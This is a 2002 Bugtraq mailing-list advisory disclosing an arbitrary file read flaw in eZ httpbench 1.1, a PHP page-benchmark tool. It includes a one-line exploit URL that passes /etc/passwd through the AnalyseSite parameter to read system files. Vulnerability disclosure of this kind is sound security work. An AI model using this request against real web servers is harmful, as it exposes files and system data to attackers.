[27809] in bugtraq
benchmark tool for HTTP pages.
daemon@ATHENA.MIT.EDU (Tacettin Karadeniz)
Mon Nov 11 11:29:32 2002
Message-ID: <20021110170923.83216.qmail@web21305.mail.yahoo.com>
Date: Sun, 10 Nov 2002 09:09:23 -0800 (PST)
From: Tacettin Karadeniz <tacettinkaradeniz@yahoo.com>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
ezhttpbench.php
eZ httpbench version 1.1 (http://developer.ez.no) -
benchmark tool for HTTP pages.
A security vulnerability in the product allows remote attackers to
download any file on the local system that the eZ httpbench has read
access to.
Vulnerable systems:
eZ httpbench version 1.1
The eZ httpbench PHP script allows remote visitors to view
any file on a webserver.
Exploit:
http://www.web_sitesi/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
This will display /etc/passwd (if the webserver
user has access to this file).